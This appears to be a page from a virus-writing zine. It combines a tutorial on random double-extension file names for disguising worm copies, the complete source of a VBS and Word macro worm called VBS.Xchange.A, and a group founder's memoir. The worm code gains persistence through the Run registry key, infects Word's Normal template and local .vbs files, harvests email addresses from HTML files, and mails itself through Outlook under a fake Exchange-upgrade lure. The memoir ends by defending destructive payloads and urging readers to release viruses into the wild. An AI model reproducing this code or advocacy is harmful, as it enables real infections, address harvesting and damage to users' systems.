RANDOM NAME GENERATOR: # ########################## Like I said in my last article about "Hide a copy a of worm" we are going to make the same thing in VBS. 1) tmpname="" ' Value of tmpname is NULL 2) randomize(timer) ' Random size of the first part of name namel=int(rnd(1)*20)+1 ' between 1 and 20. 3) For lettre = 1 To namel ' Put the letter. randomize(timer) ' 97 : Start from "a" (65 : Start from "A") tmpname=tmpname & chr(int(rnd(1)*26)+97) ' 26 : from "a-A" to "z-Z" Next ' for number 26 => 9 and 97 => 48 4) typext = "execombatbmpjpggifdocxlsppthtmhtthta" ' Now we choice an extension between 12 differents. randomize(timer) tmpext = int(rnd(1)*11)+1 5) tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs" ' And we have the result Code Source: ************************************************************************************************************************ tmpname="" randomize(timer) namel=int(rnd(1)*20)+1 For lettre = 1 To namel randomize(timer) tmpname=tmpname & chr(int(rnd(1)*26)+97) Next typext = "execombatbmpjpggifdocxlsppthtmhtthta" randomize(timer) tmpext = int(rnd(1)*11)+1 tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs" MsgBox tmpname ************************************************************************************************************************ Some Examples: mhrmhoulleyl.htm.vbs rlvqmtyppjcbho.bat.vbs PREYXUDBNYKNLRSALL.DOC.VBS 869768177527247364.gif.vbs ... ... This technics is extra to change name of worms copy ineach start (look at my last article) ############### # CONCLUSION: # ############### This is the end of the article. I hope that it help you in your creations and research. If you have any suggestions or comments, please mail me (see contact-page). PetiK

sources

VBS.Xchange.A PetiK VBS.Xchange.A ************** by PetiK A VBS/DOC infector coded in VBS. Here is the code: 'VBS.Xchange.A On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") Set fl=fso.OpenTextFile(WScript.ScriptFullname,1) virus=fl.ReadAll fl.Close Set win=fso.GetSpecialFolder(0) fcopy=win&"\MSXchange.vbs" reg="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" fso.GetFile(WScript.ScriptFullName).Copy(fcopy) ws.RegWrite reg&"\MsExchange",fcopy set sp=fso.CreateTextFile("C:\XChange.vba",True,8) sp.WriteLine "Attribute VB_Name = ""Xchange""" sp.WriteLine "Sub AutoOpen()" sp.WriteLine "On Error Resume Next" sp.WriteLine "e = """"" For i=1 To len(virus) e=Mid(virus,i,1) e=Hex(Asc(e)) If Len(e)=1 Then e="0"&e End If f=f+e If Len(f)=110 Then sp.WriteLine "e = e + """+f+"""" f="" End If If Len(virus)-i = 0 Then sp.WriteLine "e = e + """+f+"""" f="" End If Next sp.WriteLine "read=dec(e)" sp.WriteLine "Open ""C:\xchange.vbs"" For Output As #1" sp.WriteLine "Print #1, read" sp.WriteLine "Close #1" sp.WriteLine "Shell ""wscript C:\xchange.vbs""" sp.WriteLine "Call infect_fichier" sp.WriteLine "End Sub" sp.WriteLine "" sp.WriteLine "Sub HelpAbout()" sp.WriteLine "On Error Resume Next" sp.WriteLine "MsgBox ""This is my very first VBS-W97M Worm"", vbInformation, ""I-Worm.Xchange""" sp.WriteLine "End Sub" sp.WriteLine "" sp.WriteLine "Sub AutoClose()" sp.WriteLine "On Error Resume Next" sp.WriteLine "FileSystem.Kill ""C:\xchange.vbs""" sp.WriteLine "End Sub" sp.WriteLine "" sp.WriteLine "Sub infect_fichier()" sp.WriteLine "On Error Resume Next" sp.WriteLine "Set nor = NormalTemplate.VBProject.VBComponents" sp.WriteLine "Set doc = ActiveDocument.VBProject.VBComponents" sp.WriteLine "df = ""C:\XChange.vba""" sp.WriteLine "If nor.Item(""Xchange"").Name <> ""Xchange"" Then" sp.WriteLine " doc(""Xchange"").Export df" sp.WriteLine " nor.Import df" sp.WriteLine "End If" sp.WriteLine "If doc.Item(""Xchange"").Name <> ""Xchange"" Then" sp.WriteLine " nor(""Xchange"").Export df" sp.WriteLine " doc.Import df" sp.WriteLine " ActiveDocument.Save" sp.WriteLine "End If" sp.WriteLine "End Sub" sp.WriteLine "" sp.WriteLine "Function dec(octe)" sp.WriteLine "For hexad = 1 To Len(octe) Step 2" sp.WriteLine "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))" sp.WriteLine "Next" sp.WriteLine "End Function" sp.Close infvbs(win) infvbs(fso.GetSpecialFolder(1)) SendWithOutlook() Set wd=CreateObject("Word.Application") If ws.RegRead ("HKLM\Software\Microsoft\MsXchange") <> "Coded by PetiK (c)2002" then CN = CreateObject("WScript.NetWork").ComputerName Set srch=wd.Application.FileSearch srch.Lookin = "C:\": srch.SearchSubFolders = True: srch.FileName="*.doc;*.dot": srch.Execute Set sp=fso.OpenTextFile(fcopy,8) sp.WriteLine "'On "&date& " at "&time&" from "&CN sp.WriteLine "'Number of DOC and DOT file found : "& srch.FoundFiles.Count sp.WriteBlankLines(1) sp.Close ws.RegWrite "HKLM\Software\Microsoft\MsXchange","Coded by PetiK (c)2002" End If Set vba=wd.NormalTemplate.VBProject.VBComponents If vba.Item("Xchange").Name <> "Xchange" Then vba.Import "C:\XChange.vba" wd.Application.NormalTemplate.Save End If wd.Application.NormalTemplate.Close wd.Application.Quit Set mel=fso.CreateTextFile(win&"\kitep.wab.txt",8,TRUE) counter=0 lect() mel.WriteLine "#" mel.Close WScript.Quit Sub lect() On Error Resume Next Set dr=fso.Drives For Each d in dr If d.DriveType=2 or d.DriveType=3 Then list(d.path&"\") End If Next End Sub Sub spreadmailto(dir) On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set f=fso.GetFolder(dir) Set cf=f.Files For Each fil in cf ext=fso.GetExtensionName(fil.path) ext=lcase(ext) if (ext="htm") or (ext="html") or (ext="htt") or (ext="asp") Then set htm=fso.OpenTextFile(fil.path,1) verif=True allhtm=htm.ReadAll() htm.Close For ml=1 To Len(allhtm) count=0 If Mid(allhtm,ml,7) = "mailto:" Then counter=counter+1 mlto="" Do While Mid(allhtm,ml+6+count,1) <> """" count=count+1 mlto = mlto + Mid(allhtm,ml+6+count,1) loop mel.WriteLine counter &" <"&left(mlto,len(mlto)-1)&">" sendmailto(left(mlto,len(mlto)-1)) End If Next End If Next End Sub Sub list(dir) On Error Resume Next Set f=fso.GetFolder(dir) Set ssf=f.SubFolders For Each fil in ssf spreadmailto(fil.path) list(fil.path) Next End Sub Sub sendmailto(email) Set out=CreateObject("Outlook.Application") Set mailmelto=out.CreateItem(0) mailmelto.To email mailmelto.Subject "Upgrade Ms Exchange" mailmelto.Body "Run this attached file to upgrade Ms Exchange" mailmelto.Attachment.Add (WScript.ScriptFullName) mailmelto.DeleteAfterSubmit = True mailmelto.Send Set out = Nothing End Sub Sub SendWithOutlook() Set A=CreateObject("Outlook.Application") Set B=A.GetNameSpace("MAPI") For Each C In B.AddressLists If C.AddressEntries.Count <> 0 Then For D=1 To C.AddressEntries.count Set E=C.AddressEntries(D) Set F=A.CreateItem(0) F.To=E.Address F.Subject="Update and upgrade MS Exchange." F.Body="run this attached file to update Ms Exchange. See you soon." Set G=CreateObject("Scripting.FileSystemObject") F.Attachments.Add(fcopy) F.DeleteAfterSubmit=True If F.To <> "" Then F.Send End If Next End If Next End Sub Function infvbs(Folder) If f.FolderExists(Folder) then For each P in f.GetFolder(Folder).Files ext=f.GetExtensionName(P.Name) If ext="vbs" or ext="vbe" Then Set VF=f.OpenTextFile(P.path, 1) mark=VF.Read(14) VF.Close If mark <> "'VBS.Xchange.A" Then Set VF=f.OpenTextFile(P.path, 1) VC=VF.ReadAll VF.Close VCd=virus & VC Set VF=f.OpenTextFile(P.path,2,True) VF.Write VCd VF.Close End If End If Next End If End Function

articles

Full Disclosure philet0ast3r Full Disclosure a self-reflection of my time with the rRlf and the virus scene by philet0ast3r Hi, my name is Stefan, I'm (nearly) 26 years old and live in a not too small but not really big city in Bavaria, Germany. I work as a care specialist at a home for mentally heavy handicapped people. That job is strenous and you need lots of patience for it, but it's also lots of fun. Which to some part depends on my great colleagues, who are mostly nice girls around my age (hi Verena, hi Claudia :). In my spare time I love to meet people, listen to music (crust and d-beat), watch movies, play with my pc, go snowboarding, do any kind of stupid bullshit, cause I'm an adrenalin-junkie, get drunk or stoned. The above picture is me from some time ago. But I look quite the same right now. Just got a different haircut. Haircuts never last long with me, and I like the above picture, so I didn't put one from at the moment. Most of you probably know me better under the name philet0ast3r (or short: philie), I am one of the three founders of the Ready Rangers Liberation Front, and the last active one to close it now, that's why we are here. This article is a self-reflection for me of what happened over the years from beginning to the end. Eight years is a long time. I thought it may interest some people to know some backgrounds, so I decided to write it all down. But now lets get back in time to the proclaimed end of the world. Do you remember new years eve 2000? I hate new years eve parties, they are shit most of the time. 2000 was the worst till now. Then, half a year after the apocalype I still found myself hanging around in this lameass boring Bavarian province town called Hirschau. If there would not have been just the right bunch of people at the right time, I would have probably ended up as a farmer that spends all his money on VW-tuning. But thanks to the Goddess there were those people. No one of us had a car, so we most of the time had to hang around in our town. Skating, drinking beer and smoking weed all day long. There's one cool thing in Hirschau, that's Monte Kaolino, a gigantic mountain of white sand. I think the biggest sand-mountain in Europe. Every year there's Sandboard WM there. So one fine friday afternoon, the 21st of July 2000, we were sitting around in front of a Netto supermarket, where we used to skate. Me and my friends Sebi (dr.g0nZo or dg0) and Crazy Phil (El DudErin0 or eeo) had some experience with lame keyloggers, sub7 and back orifice, which were trendy at that time. So sitting there at the 90% empty parking spaces in front of a supermarket, we thought we could waste some time by founding a cool computer-underground-hacker-group. Ok, done. Now we needed a name for that group. At that time we were all fascinated by discordianism a parody-religion, that gives some good non-parody-stuff for thinking about religion and life (search for Prinzipia Discordia, if you are interested). There was a discordian group called ELF: Erisian Liberation Front. We liked that and took over the Liberation Front. eeo had an alien workshop skateboard deck at that time: So that's where the Ready Rangers comes from. I remember I got home in the evening, and started to work on a logo and a homepage. We were meeting up again later to drink some beer, and me and eeo both finished a logo. That was mine: But it was too big and crappy, so we took eeos for the page: Our first homepage was located at readyrangers.tsx.org. On it was some info about us, a guestbook, some pictures and I don't know really. We were nothing about viruses in the beginning, just some "here we are, and this is our bullshit". About that time, I made my first contact with a computer virus. It was a mbr-infector that killed my partition table in the end. The second one came short after: Good ol Parity.Boot.B. These things somehow caught my mind and I wanted to know how to do something like that, so I searched around the net and finally found a asm-vck. I played around with it and tried to learn from the code, but asm was too complicated at the beginning (also later: I retried learning asm, but was way too lazy. The little things I can do in asm suck big time). Some time later I stumbled over a batch vck, I think it was from Wavefunc. I began to experiment around with batch and after a while wrote my first virus, called hAwasupaAE together with dg0. Or better: Ant!logic, that was his nick to that time. He changed it to 7r!NT after a short time, but after we found out, that trint was the name of a plane engine, we always made fun of him (trint the drunken engine, or something like that). So he changed it again to dr.g0nZo (that's the fake name of Oscar Zeta Acosta in Hunter S. Thompsons Fear and Loathing in Las Vegas ... btw: El DudErin0 comes from The big Lebowski). My nick at that time was sicBrain, which now really sucks, so I changed it to philet0ast3r (someone who toasts files ;) after a while. I stuck with that nick and still use it (or its short form philie) for nearly everything. Now where was I? hAwasupaAE. It's also included in this zine. Our page readyrangers.tsx.org went down for some reason, so we made up our new home at readyrangers.de.vu (which still works, check it out). Now expanding our stuff to our first batch-virus tries and photoshop-pictures we called psychadelic art. Responsible for the last was mostly rastafarie, who was also from Hirschau. Other members at the beginning were pRe4Ch_0_23 from Hirschau, and TeAgeCe, rastafaries cousin. Both were kicked after a short while for like doing nothing at all, while I improved my e-mail- and web-account hacking skills. Which nearly brought me into lots of trouble, so I decided to get some distance and concentrate more on batch and virus writing. Btw hacking: We had this hacking contest on our page in the early days called D33p Ph0rest. That's from the original page: Here you can register for the D33p Ph0rest Hacking-Contest. It is split in 10 phases. If you ended one phase with success you get access to a higher phase. In every phase you have to solve tasks, which have something to do with a certain topic (guess what ;)). Those tasks get more difficult from time to time. You can win: E-mail-addresse with @rRlf.de, a guest-account (www.rRlf.de/your_name), or you can become a rRlf-member. [some registering field] You will get a mail with the first task. You really don't need much knowledge for the beginning, D33p Ph0rest is for you to learn, how such things work. Joing is also interesting for 31337-h4xX0r-d00dz, because it gets really difficult in higher phases. If someone needs a hint, he can write to philet0ast3r. He will get the hint (we want to learn something, dont we?). You had to manage different things like account hacking, some cracking, social engineering, and stuff like that, which was really easy in the first "phases", but got quite hard later. Unfortunatelly I lost all the tasks. There were only two people who got through all 10 phases: 7r1NT (aka dg0) and mirdochwurscht (aka pRe4Ch_0_23). The last one with fuckin lots of help and hints... The thing was funny somehow. You can watch the old ranks (or "Hall 0f Phame", how we called it) here: web.archive.org/web/20020127021457/www.rrlf.de/hall0fphame.html I think it were the annoying ads that brought us to get our own domain. The infamous rRlf.de. I recently found this picture, which was on the page, while I was still working on it: End of March 2001 the page was finally ready, it lost its absolutly-script-kiddie style and got a bit more serious. That page style lasted all the years, just the colors changed from time to time. Around that time I made contacts here and there in the virus scene, found more and more virus groups, discovered #virus and #vxers on undernet.irc (kixorball was great, does that still exist?), met and learned to know lots of virus coders there, read myself through lots of old virus zines. One of the people I knew to that time was Zoom23, who was the editor of Pinoy Virus Writers Zine (which was *very* lame the first few issues). I showed him my virus "BlackDay phinal" and he said he wanted to take it for pvw#6. Wow, that was a cool moment. Like the first time sex. Now I was a pro-virus-coder whos stuff gets released in zines. W00t. In July 2001 Necronomikon joined the rRlf, but left it again after not even two weeks (on our first birthday!). He said it was because of exams, but I don't believe him. I think more it was because we had a bad reputation in the virus scene at that time. Well, bad reputation is the wrong term. People were calling us lamers because we were doing only batch stuff. We were no lamers but beginners. Since I know the virus scene, some people who consider themselves being part of it, say "the virus scene dies". From 2000 to 2008. A long death. But from their point of view it of course dies, because old pros quit, and new beginners are lamers. I don't get why being new is lame. It's kinda like that in every computer-subculuture. Too much people with that opinion. Just Bullshit. Like they were born pros. rRlf was always a platform for beginner virus writers, we had just a few members who made themselves a name in the virus scene before entering rRlf. And now look, where it brought us. And where are those assholes doing nothing, than hang around in irc and calling other people lamers? Long forgotten. But no blame on Necronomikon. I don't know him very well, but also we never really lost contact. He's a nice guy for sure and he always contributed some stuff to our zines, also to this last one. A month later Jimmy joined the rRlf, who later changed his name to Energy. I don't know really much about this guy, he was kinda strange. One more month later I joined SallyOne Group, so I was now in two groups. Does anyone remember SallyOne? That was a huge archive for anything virus related. Like VX Heavens or VX Chaos. I knew BTK, the owner of SallyOne. He invited me to join his new group, as he wanted to not just put stuff for download, but also release a own zine. So he needed people for his crew. Soon after that SallyOne was kicked by its isp and disappeared, just the group remained, which was hosted now on rRlf.de. We were working on SallyOne Group #1 for a while. Meanwhile the rRlf got a new member: luN4, who later changed her name to disk0rdia. She was doing mainly poems (kinda stupid if I read them now) and later photos. A very nice girl from the city where I live now. I know her well since that time, and we are still friends today (my bat.kia is dedicated to her). Btw: I think we were the only virus group with also members, that don't code but do any kind of other art, like pictures, short stories or poems. And I noticed some influence. Other groups also started to put some pictures and artworks in their zines. Keep that up guys, it's great! Now 2002, we were still working on stuff for SallyOne Group #1 as BTK, after the loss of his online virus archive decided to quit. The group lost its leader and broke apart. Man, the group page had this fantastic Matrix like looking ball to scroll around as menu... Amazing. The only guy I kept contact from SallyOne Group afterwards was ToxiC. We also hosted his page for a while. I was so looking forward to the SallyOne Group zine, that with it not coming out, we thought: Fuck it, if you wanna do it right, you gotta do it yourself. So we decided to bring out our own zine. It already came out one month later. Short before the release Energy left the rRlf, don't really know why. For being in the same group we really had too less contact. But a week later ppacket joined the rRlf. I knew him from Pinoy Virus Writers. And I'm not sure, maybe he was also a member of SallyOne Group. Anyways: rRlf#1 was great! Ok, ok, it sucks :) But it was great at that time, and it was a great step forward for the group. "When the going gets weird the weird turn pro" ... our turn. What I liked very much in the first issues of rRlf zine, that they were made up like a real magazine. Not just "virus section", "tutorial section", "tools section", click on what you want, but you could kind of turn the pages like, yeah, a real magazine. There was code, turn the page: a tutorial, turn the page: code, turn the page: an artwork to chill between the codes. There's a very low quality picture in rRlf#1 called RRLF2 by El DudErin0: This picture was made by a machine in a big shopping center. You could stand before it, get photographed and mail the picture away. On it are from left to right: rastafarie, eeo and me. Also in rRlf#1 is a shitty article by me called "The Virus Scene today". But there's one hot topic in it, I want to comment on. Or maybe two. Destructive payloads and putting viruses in the wild. I still got the same opinion as expressed in the article from six years ago. I'm not against destructive payloads. In a way I think they are even good. Good if you want to transport a (maybe political) message with your virus. The pathetic human of today tends to only listen if you slap him in the face first. That's also the reason why going to a peacefull demonstration will never change anything. Riots do. As my father used to say: "First there has to happen something, before something happens." Violence can not be rejected completely, it just may not be used senseless and without purpose. So I think, destructive payloads for viruses are ok, if you use them wisely. Second: We are virus and worm writers. It is a virus, when it infects other files, a worm, when it spreads by itself. Anyway, the purpose of both is reproduction. It's in their nature. Don't be a bad creator and keep your creations from their natural destiny. Spread your viruses people! But them in the wild! Infect everything whenever you can! It's ok to say officially you are against spreading, I did, but I think about 50% of the people I know are liars if it comes to this ;) If you got a different opinion ok, but don't hate people who spread viruses, it might be also the one you chat with, or the one in your group. Where you think all those wide spread viruses come from? Single coders no one knows?